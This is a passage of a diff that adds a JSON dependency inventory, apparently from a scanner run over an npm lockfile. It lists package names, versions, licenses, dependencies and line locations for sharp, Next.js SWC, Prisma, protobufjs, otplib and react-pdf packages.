"pkg:npm/%40img/sharp-linux-ppc64@0.34.5", + "UID": "5f296de259dc5fcd" + }, + "Version": "0.34.5", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@img/sharp-libvips-linux-ppc64@1.2.4" + ], + "Locations": [ + { + "StartLine": 1204, + "EndLine": 1225 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@img/sharp-linux-riscv64@0.34.5", + "Name": "@img/sharp-linux-riscv64", + "Identifier": { + "PURL": "pkg:npm/%40img/sharp-linux-riscv64@0.34.5", + "UID": "cff738e1ea5bf03f" + }, + "Version": "0.34.5", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@img/sharp-libvips-linux-riscv64@1.2.4" + ], + "Locations": [ + { + "StartLine": 1226, + "EndLine": 1247 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@img/sharp-linux-s390x@0.34.5", + "Name": "@img/sharp-linux-s390x", + "Identifier": { + "PURL": "pkg:npm/%40img/sharp-linux-s390x@0.34.5", + "UID": "5ba6c19adc33acb1" + }, + "Version": "0.34.5", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@img/sharp-libvips-linux-s390x@1.2.4" + ], + "Locations": [ + { + "StartLine": 1248, + "EndLine": 1269 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@img/sharp-linux-x64@0.34.5", + "Name": "@img/sharp-linux-x64", + "Identifier": { + "PURL": "pkg:npm/%40img/sharp-linux-x64@0.34.5", + "UID": "899053386aaceb6f" + }, + "Version": "0.34.5", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@img/sharp-libvips-linux-x64@1.2.4" + ], + "Locations": [ + { + "StartLine": 1270, + "EndLine": 1291 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@img/sharp-linuxmusl-arm64@0.34.5", + "Name": "@img/sharp-linuxmusl-arm64", + "Identifier": { + "PURL": "pkg:npm/%40img/sharp-linuxmusl-arm64@0.34.5", + "UID": "49434b0f2e4c552" + }, + "Version": "0.34.5", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@img/sharp-libvips-linuxmusl-arm64@1.2.4" + ], + "Locations": [ + { + "StartLine": 1292, + "EndLine": 1313 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@img/sharp-linuxmusl-x64@0.34.5", + "Name": "@img/sharp-linuxmusl-x64", + "Identifier": { + "PURL": "pkg:npm/%40img/sharp-linuxmusl-x64@0.34.5", + "UID": "ad906505494c6eb4" + }, + "Version": "0.34.5", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@img/sharp-libvips-linuxmusl-x64@1.2.4" + ], + "Locations": [ + { + "StartLine": 1314, + "EndLine": 1335 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@img/sharp-wasm32@0.34.5", + "Name": "@img/sharp-wasm32", + "Identifier": { + "PURL": "pkg:npm/%40img/sharp-wasm32@0.34.5", + "UID": "d2f6e4040e44ad8" + }, + "Version": "0.34.5", + "Licenses": [ + "Apache-2.0 AND LGPL-3.0-or-later AND MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@emnapi/runtime@1.10.0" + ], + "Locations": [ + { + "StartLine": 1336, + "EndLine": 1354 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@img/sharp-win32-arm64@0.34.5", + "Name": "@img/sharp-win32-arm64", + "Identifier": { + "PURL": "pkg:npm/%40img/sharp-win32-arm64@0.34.5", + "UID": "6e6d038a733af9f8" + }, + "Version": "0.34.5", + "Licenses": [ + "Apache-2.0 AND LGPL-3.0-or-later" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 1355, + "EndLine": 1373 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@img/sharp-win32-ia32@0.34.5", + "Name": "@img/sharp-win32-ia32", + "Identifier": { + "PURL": "pkg:npm/%40img/sharp-win32-ia32@0.34.5", + "UID": "b8c0b96d5b9c4a91" + }, + "Version": "0.34.5", + "Licenses": [ + "Apache-2.0 AND LGPL-3.0-or-later" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 1374, + "EndLine": 1392 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@img/sharp-win32-x64@0.34.5", + "Name": "@img/sharp-win32-x64", + "Identifier": { + "PURL": "pkg:npm/%40img/sharp-win32-x64@0.34.5", + "UID": "2ab4e03baef70224" + }, + "Version": "0.34.5", + "Licenses": [ + "Apache-2.0 AND LGPL-3.0-or-later" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 1393, + "EndLine": 1411 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@ioredis/commands@1.5.1", + "Name": "@ioredis/commands", + "Identifier": { + "PURL": "pkg:npm/%40ioredis/commands@1.5.1", + "UID": "eb47b9c38c9e63e9" + }, + "Version": "1.5.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 1412, + "EndLine": 1417 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@isaacs/cliui@8.0.2", + "Name": "@isaacs/cliui", + "Identifier": { + "PURL": "pkg:npm/%40isaacs/cliui@8.0.2", + "UID": "64e2e3f4f3e76f6b" + }, + "Version": "8.0.2", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "string-width-cjs@4.2.3", + "string-width@5.1.2", + "strip-ansi-cjs@6.0.1", + "strip-ansi@7.2.0", + "wrap-ansi-cjs@7.0.0", + "wrap-ansi@8.1.0" + ], + "Locations": [ + { + "StartLine": 1418, + "EndLine": 1434 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@jridgewell/gen-mapping@0.3.13", + "Name": "@jridgewell/gen-mapping", + "Identifier": { + "PURL": "pkg:npm/%40jridgewell/gen-mapping@0.3.13", + "UID": "efcecdf52b58c26c" + }, + "Version": "0.3.13", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@jridgewell/sourcemap-codec@1.5.5", + "@jridgewell/trace-mapping@0.3.31" + ], + "Locations": [ + { + "StartLine": 1527, + "EndLine": 1536 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@jridgewell/resolve-uri@3.1.2", + "Name": "@jridgewell/resolve-uri", + "Identifier": { + "PURL": "pkg:npm/%40jridgewell/resolve-uri@3.1.2", + "UID": "4ce5eea195f9e6c8" + }, + "Version": "3.1.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 1537, + "EndLine": 1545 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@jridgewell/sourcemap-codec@1.5.5", + "Name": "@jridgewell/sourcemap-codec", + "Identifier": { + "PURL": "pkg:npm/%40jridgewell/sourcemap-codec@1.5.5", + "UID": "5dfab96ed52867bb" + }, + "Version": "1.5.5", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 1546, + "EndLine": 1551 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@jridgewell/trace-mapping@0.3.31", + "Name": "@jridgewell/trace-mapping", + "Identifier": { + "PURL": "pkg:npm/%40jridgewell/trace-mapping@0.3.31", + "UID": "9d887a1a1186978e" + }, + "Version": "0.3.31", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@jridgewell/resolve-uri@3.1.2", + "@jridgewell/sourcemap-codec@1.5.5" + ], + "Locations": [ + { + "StartLine": 1552, + "EndLine": 1561 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@js-sdsl/ordered-map@4.4.2", + "Name": "@js-sdsl/ordered-map", + "Identifier": { + "PURL": "pkg:npm/%40js-sdsl/ordered-map@4.4.2", + "UID": "8493d79cfa46f213" + }, + "Version": "4.4.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 1562, + "EndLine": 1572 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@next/env@14.2.3", + "Name": "@next/env", + "Identifier": { + "PURL": "pkg:npm/%40next/env@14.2.3", + "UID": "53a37ed9fb3e5ed2" + }, + "Version": "14.2.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 1573, + "EndLine": 1578 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@next/swc-darwin-arm64@14.2.3", + "Name": "@next/swc-darwin-arm64", + "Identifier": { + "PURL": "pkg:npm/%40next/swc-darwin-arm64@14.2.3", + "UID": "d4e3d5157716fa8" + }, + "Version": "14.2.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 1579, + "EndLine": 1594 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@next/swc-darwin-x64@14.2.3", + "Name": "@next/swc-darwin-x64", + "Identifier": { + "PURL": "pkg:npm/%40next/swc-darwin-x64@14.2.3", + "UID": "5185d7b01816910f" + }, + "Version": "14.2.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 1595, + "EndLine": 1610 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@next/swc-linux-arm64-gnu@14.2.3", + "Name": "@next/swc-linux-arm64-gnu", + "Identifier": { + "PURL": "pkg:npm/%40next/swc-linux-arm64-gnu@14.2.3", + "UID": "35f5ba8ee5d81bef" + }, + "Version": "14.2.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 1611, + "EndLine": 1626 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@next/swc-linux-arm64-musl@14.2.3", + "Name": "@next/swc-linux-arm64-musl", + "Identifier": { + "PURL": "pkg:npm/%40next/swc-linux-arm64-musl@14.2.3", + "UID": "6c255e66f42eaeac" + }, + "Version": "14.2.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 1627, + "EndLine": 1642 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@next/swc-linux-x64-gnu@14.2.3", + "Name": "@next/swc-linux-x64-gnu", + "Identifier": { + "PURL": "pkg:npm/%40next/swc-linux-x64-gnu@14.2.3", + "UID": "803644e854a1f62" + }, + "Version": "14.2.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 1643, + "EndLine": 1658 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@next/swc-linux-x64-musl@14.2.3", + "Name": "@next/swc-linux-x64-musl", + "Identifier": { + "PURL": "pkg:npm/%40next/swc-linux-x64-musl@14.2.3", + "UID": "2c1a5cf01d5007db" + }, + "Version": "14.2.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 1659, + "EndLine": 1674 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@next/swc-win32-arm64-msvc@14.2.3", + "Name": "@next/swc-win32-arm64-msvc", + "Identifier": { + "PURL": "pkg:npm/%40next/swc-win32-arm64-msvc@14.2.3", + "UID": "d34908e1e777e08b" + }, + "Version": "14.2.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 1675, + "EndLine": 1690 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@next/swc-win32-ia32-msvc@14.2.3", + "Name": "@next/swc-win32-ia32-msvc", + "Identifier": { + "PURL": "pkg:npm/%40next/swc-win32-ia32-msvc@14.2.3", + "UID": "a3e5ff8ac435e64e" + }, + "Version": "14.2.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 1691, + "EndLine": 1706 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@next/swc-win32-x64-msvc@14.2.3", + "Name": "@next/swc-win32-x64-msvc", + "Identifier": { + "PURL": "pkg:npm/%40next/swc-win32-x64-msvc@14.2.3", + "UID": "dc497037375f62db" + }, + "Version": "14.2.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 1707, + "EndLine": 1722 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@noble/ciphers@1.3.0", + "Name": "@noble/ciphers", + "Identifier": { + "PURL": "pkg:npm/%40noble/ciphers@1.3.0", + "UID": "fd19337833641d82" + }, + "Version": "1.3.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 1723, + "EndLine": 1734 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@noble/hashes@1.8.0", + "Name": "@noble/hashes", + "Identifier": { + "PURL": "pkg:npm/%40noble/hashes@1.8.0", + "UID": "4d82546712633fbd" + }, + "Version": "1.8.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 1735, + "EndLine": 1746 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@nodable/entities@2.1.0", + "Name": "@nodable/entities", + "Identifier": { + "PURL": "pkg:npm/%40nodable/entities@2.1.0", + "UID": "ed0bac1f7e7af25f" + }, + "Version": "2.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 1747, + "EndLine": 1759 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@nodelib/fs.scandir@2.1.5", + "Name": "@nodelib/fs.scandir", + "Identifier": { + "PURL": "pkg:npm/%40nodelib/fs.scandir@2.1.5", + "UID": "24c8e559f75b9ff1" + }, + "Version": "2.1.5", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@nodelib/fs.stat@2.0.5", + "run-parallel@1.2.0" + ], + "Locations": [ + { + "StartLine": 1760, + "EndLine": 1772 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@nodelib/fs.stat@2.0.5", + "Name": "@nodelib/fs.stat", + "Identifier": { + "PURL": "pkg:npm/%40nodelib/fs.stat@2.0.5", + "UID": "695e27b7bd8bc4a3" + }, + "Version": "2.0.5", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 1773, + "EndLine": 1781 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@nodelib/fs.walk@1.2.8", + "Name": "@nodelib/fs.walk", + "Identifier": { + "PURL": "pkg:npm/%40nodelib/fs.walk@1.2.8", + "UID": "d1cf951d273e7f57" + }, + "Version": "1.2.8", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@nodelib/fs.scandir@2.1.5", + "fastq@1.20.1" + ], + "Locations": [ + { + "StartLine": 1782, + "EndLine": 1794 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@one-ini/wasm@0.1.1", + "Name": "@one-ini/wasm", + "Identifier": { + "PURL": "pkg:npm/%40one-ini/wasm@0.1.1", + "UID": "d7afb4b95f9871be" + }, + "Version": "0.1.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 1795, + "EndLine": 1800 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@opentelemetry/api@1.9.1", + "Name": "@opentelemetry/api", + "Identifier": { + "PURL": "pkg:npm/%40opentelemetry/api@1.9.1", + "UID": "3d1d469bf1c89f7" + }, + "Version": "1.9.1", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 1801, + "EndLine": 1810 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@otplib/core@12.0.1", + "Name": "@otplib/core", + "Identifier": { + "PURL": "pkg:npm/%40otplib/core@12.0.1", + "UID": "8c7433bcb064243" + }, + "Version": "12.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 1811, + "EndLine": 1816 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@otplib/plugin-crypto@12.0.1", + "Name": "@otplib/plugin-crypto", + "Identifier": { + "PURL": "pkg:npm/%40otplib/plugin-crypto@12.0.1", + "UID": "8c029d598e4d20b0" + }, + "Version": "12.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@otplib/core@12.0.1" + ], + "Locations": [ + { + "StartLine": 1817, + "EndLine": 1826 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@otplib/plugin-thirty-two@12.0.1", + "Name": "@otplib/plugin-thirty-two", + "Identifier": { + "PURL": "pkg:npm/%40otplib/plugin-thirty-two@12.0.1", + "UID": "43721dbe2c863f60" + }, + "Version": "12.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@otplib/core@12.0.1", + "thirty-two@1.0.2" + ], + "Locations": [ + { + "StartLine": 1827, + "EndLine": 1837 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@otplib/preset-default@12.0.1", + "Name": "@otplib/preset-default", + "Identifier": { + "PURL": "pkg:npm/%40otplib/preset-default@12.0.1", + "UID": "f5a349ea11a9d189" + }, + "Version": "12.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@otplib/core@12.0.1", + "@otplib/plugin-crypto@12.0.1", + "@otplib/plugin-thirty-two@12.0.1" + ], + "Locations": [ + { + "StartLine": 1838, + "EndLine": 1849 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@otplib/preset-v11@12.0.1", + "Name": "@otplib/preset-v11", + "Identifier": { + "PURL": "pkg:npm/%40otplib/preset-v11@12.0.1", + "UID": "66521fbaa0b6efe4" + }, + "Version": "12.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@otplib/core@12.0.1", + "@otplib/plugin-crypto@12.0.1", + "@otplib/plugin-thirty-two@12.0.1" + ], + "Locations": [ + { + "StartLine": 1850, + "EndLine": 1860 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@pkgjs/parseargs@0.11.0", + "Name": "@pkgjs/parseargs", + "Identifier": { + "PURL": "pkg:npm/%40pkgjs/parseargs@0.11.0", + "UID": "7b745dbb6211cbf3" + }, + "Version": "0.11.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 1871, + "EndLine": 1880 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@prisma/client@5.22.0", + "Name": "@prisma/client", + "Identifier": { + "PURL": "pkg:npm/%40prisma/client@5.22.0", + "UID": "e2463266a9694e63" + }, + "Version": "5.22.0", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "prisma@5.22.0" + ], + "Locations": [ + { + "StartLine": 1881, + "EndLine": 1898 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@prisma/debug@5.22.0", + "Name": "@prisma/debug", + "Identifier": { + "PURL": "pkg:npm/%40prisma/debug@5.22.0", + "UID": "86236e2543f93da" + }, + "Version": "5.22.0", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 1899, + "EndLine": 1905 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@prisma/engines@5.22.0", + "Name": "@prisma/engines", + "Identifier": { + "PURL": "pkg:npm/%40prisma/engines@5.22.0", + "UID": "325c20920a2c3688" + }, + "Version": "5.22.0", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@prisma/debug@5.22.0", + "@prisma/engines-version@5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2", + "@prisma/fetch-engine@5.22.0", + "@prisma/get-platform@5.22.0" + ], + "Locations": [ + { + "StartLine": 1906, + "EndLine": 1919 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@prisma/engines-version@5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2", + "Name": "@prisma/engines-version", + "Identifier": { + "PURL": "pkg:npm/%40prisma/engines-version@5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2", + "UID": "c0d189c3fa35f3ae" + }, + "Version": "5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 1920, + "EndLine": 1926 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@prisma/fetch-engine@5.22.0", + "Name": "@prisma/fetch-engine", + "Identifier": { + "PURL": "pkg:npm/%40prisma/fetch-engine@5.22.0", + "UID": "39dcf7ec6736f759" + }, + "Version": "5.22.0", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@prisma/debug@5.22.0", + "@prisma/engines-version@5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2", + "@prisma/get-platform@5.22.0" + ], + "Locations": [ + { + "StartLine": 1927, + "EndLine": 1938 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@prisma/get-platform@5.22.0", + "Name": "@prisma/get-platform", + "Identifier": { + "PURL": "pkg:npm/%40prisma/get-platform@5.22.0", + "UID": "ac1badc0a3432a3c" + }, + "Version": "5.22.0", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@prisma/debug@5.22.0" + ], + "Locations": [ + { + "StartLine": 1939, + "EndLine": 1948 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@protobufjs/aspromise@1.1.2", + "Name": "@protobufjs/aspromise", + "Identifier": { + "PURL": "pkg:npm/%40protobufjs/aspromise@1.1.2", + "UID": "cc0028b452205e63" + }, + "Version": "1.1.2", + "Licenses": [ + "BSD-3-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 1949, + "EndLine": 1955 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@protobufjs/base64@1.1.2", + "Name": "@protobufjs/base64", + "Identifier": { + "PURL": "pkg:npm/%40protobufjs/base64@1.1.2", + "UID": "8b19ed0ce9f8f0c" + }, + "Version": "1.1.2", + "Licenses": [ + "BSD-3-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 1956, + "EndLine": 1962 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@protobufjs/codegen@2.0.5", + "Name": "@protobufjs/codegen", + "Identifier": { + "PURL": "pkg:npm/%40protobufjs/codegen@2.0.5", + "UID": "66b6686c958a4e22" + }, + "Version": "2.0.5", + "Licenses": [ + "BSD-3-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 1963, + "EndLine": 1969 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@protobufjs/eventemitter@1.1.0", + "Name": "@protobufjs/eventemitter", + "Identifier": { + "PURL": "pkg:npm/%40protobufjs/eventemitter@1.1.0", + "UID": "d69e455b94b976c6" + }, + "Version": "1.1.0", + "Licenses": [ + "BSD-3-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 1970, + "EndLine": 1976 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@protobufjs/fetch@1.1.0", + "Name": "@protobufjs/fetch", + "Identifier": { + "PURL": "pkg:npm/%40protobufjs/fetch@1.1.0", + "UID": "fca39b412276b6e8" + }, + "Version": "1.1.0", + "Licenses": [ + "BSD-3-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@protobufjs/aspromise@1.1.2", + "@protobufjs/inquire@1.1.1" + ], + "Locations": [ + { + "StartLine": 1977, + "EndLine": 1987 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@protobufjs/float@1.0.2", + "Name": "@protobufjs/float", + "Identifier": { + "PURL": "pkg:npm/%40protobufjs/float@1.0.2", + "UID": "30a8b5dd4e76a00e" + }, + "Version": "1.0.2", + "Licenses": [ + "BSD-3-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 1988, + "EndLine": 1994 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@protobufjs/inquire@1.1.1", + "Name": "@protobufjs/inquire", + "Identifier": { + "PURL": "pkg:npm/%40protobufjs/inquire@1.1.1", + "UID": "d6749b8f84a66418" + }, + "Version": "1.1.1", + "Licenses": [ + "BSD-3-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 1995, + "EndLine": 2001 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@protobufjs/path@1.1.2", + "Name": "@protobufjs/path", + "Identifier": { + "PURL": "pkg:npm/%40protobufjs/path@1.1.2", + "UID": "ccf386043e695f89" + }, + "Version": "1.1.2", + "Licenses": [ + "BSD-3-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 2002, + "EndLine": 2008 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@protobufjs/pool@1.1.0", + "Name": "@protobufjs/pool", + "Identifier": { + "PURL": "pkg:npm/%40protobufjs/pool@1.1.0", + "UID": "bac25c6f940c763a" + }, + "Version": "1.1.0", + "Licenses": [ + "BSD-3-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 2009, + "EndLine": 2015 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@protobufjs/utf8@1.1.1", + "Name": "@protobufjs/utf8", + "Identifier": { + "PURL": "pkg:npm/%40protobufjs/utf8@1.1.1", + "UID": "7532ec91d4dcb3" + }, + "Version": "1.1.1", + "Licenses": [ + "BSD-3-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 2016, + "EndLine": 2022 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@react-email/render@0.0.16", + "Name": "@react-email/render", + "Identifier": { + "PURL": "pkg:npm/%40react-email/render@0.0.16", + "UID": "afd54c61cb746a4e" + }, + "Version": "0.0.16", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "html-to-text@9.0.5", + "js-beautify@1.15.4", + "react-dom@18.3.1", + "react-promise-suspense@0.3.4", + "react@18.3.1" + ], + "Locations": [ + { + "StartLine": 2023, + "EndLine": 2040 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@react-pdf/fns@2.2.1", + "Name": "@react-pdf/fns", + "Identifier": { + "PURL": "pkg:npm/%40react-pdf/fns@2.2.1", + "UID": "5c198d4528406f92" + }, + "Version": "2.2.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/runtime@7.29.2" + ], + "Locations": [ + { + "StartLine": 2041, + "EndLine": 2049 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@react-pdf/fns@3.1.3", + "Name": "@react-pdf/fns", + "Identifier": { + "PURL": "pkg:npm/%40react-pdf/fns@3.1.3", + "UID": "6ad3c91d416d181" + }, + "Version": "3.1.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 2205, + "EndLine": 2210 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@react-pdf/font@2.5.2", + "Name": "@react-pdf/font", + "Identifier": { + "PURL": "pkg:npm/%40react-pdf/font@2.5.2", + "UID": "462afc411a2ebe78" + }, + "Version": "2.5.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/runtime@7.29.2", + "@react-pdf/types@2.11.1", + "cross-fetch@3.2.0", + "fontkit@2.0.4", + "is-url@1.2.4" + ], + "Locations": [ + { + "StartLine": 2050, + "EndLine": 2062 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@react-pdf/font@4.0.8", + "Name": "@react-pdf/font", + "Identifier": { + "PURL": "pkg:npm/%40react-pdf/font@4.0.8", + "UID": "de5a92dbb166dd1a" + }, + "Version": "4.0.8", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@react-pdf/pdfkit@5.1.1", + "@react-pdf/types@2.11.1", + "fontkit@2.0.4", + "is-url@1.2.4" + ], + "Locations": [ + { + "StartLine": 2211, + "EndLine": 2222 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@react-pdf/image@2.3.6", + "Name": "@react-pdf/image", + "Identifier": { + "PURL": "pkg:npm/%40react-pdf/image@2.3.6", + "UID": "f6d603a2e91f0051" + }, + "Version": "2.3.6", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/runtime@7.29.2", + "@react-pdf/png-js@2.3.1", + "cross-fetch@3.2.0", + "jay-peg@1.1.1" + ], + "Locations": [ + { + "StartLine": 2063, + "EndLine": 2074 + } + 